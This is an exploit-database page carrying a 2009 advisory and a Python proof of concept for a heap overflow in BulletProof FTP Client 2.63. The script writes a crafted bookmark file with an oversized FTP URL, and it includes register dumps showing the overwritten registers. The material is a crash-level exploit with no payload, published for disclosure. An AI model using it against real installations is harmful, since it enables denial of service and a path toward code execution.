BulletProof FTP Client 2.63 Local Heap Overflow PoC

2009.01.02
Credit: His0k4
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python # # # ------ | ______ _____ (--, __*__ ______ # |____| | | | | | ! ) | | | # [ | |` | | <> | |-----> |__/ | | | ] # | .. | |____! |____| |____ |\ | |-----| # | _| \ ----- | ::: | # | | \ # |_____| | \ # | # | # ,|. # / | \ # | | | # | _ | # `._\/.\/_,' # _( 8 )_ # / '_ _' \ # | /{_}\ | # ` | " | ` # | | # # # [+] Application : BulletProof FTP (Client) V2.63 # # [+] Vendor URL : http://www.bpftp.com/ # # [+] Bug : BulletProof FTP Client Local Heap Overflow (PoC) # # [+] Author : His0k4 # # [+] Greetings : All friends & Muslims Hackers (dz) #--------------------------------------------------------------------------------- # EAX 41414141 # ECX 016EC370 # EDX 00000000 # EBX 41414141 # ESP 0012F548 # EBP 0012F5C4 ASCII "AAAAAAAAAAAA" # ESI 0170E70A ASCII "]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" # EDI 0170E90A ASCII 03,"ftp" # EIP 00596423 bpftpcli.00596423 #--------------------------------------------------------------------------------- header1 = "; This file was exported from BulletProof FTP Client vBulletProof FTP Client v2.63 (Build 56)\n" header2 = "; Sitename=test site\n" buff = "FTP://user:pass@" + "\x41" * 93 vuln = header1 + header2 + buff try: out_file = open("sites.txt",'w') out_file.write(vuln) out_file.close() raw_input("\nBookmark file created!\n\nNow import the file and run it\n\nPress to exit...") except: print "Error!" # EoF

References:

http://www.securityfocus.com/bid/33007


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top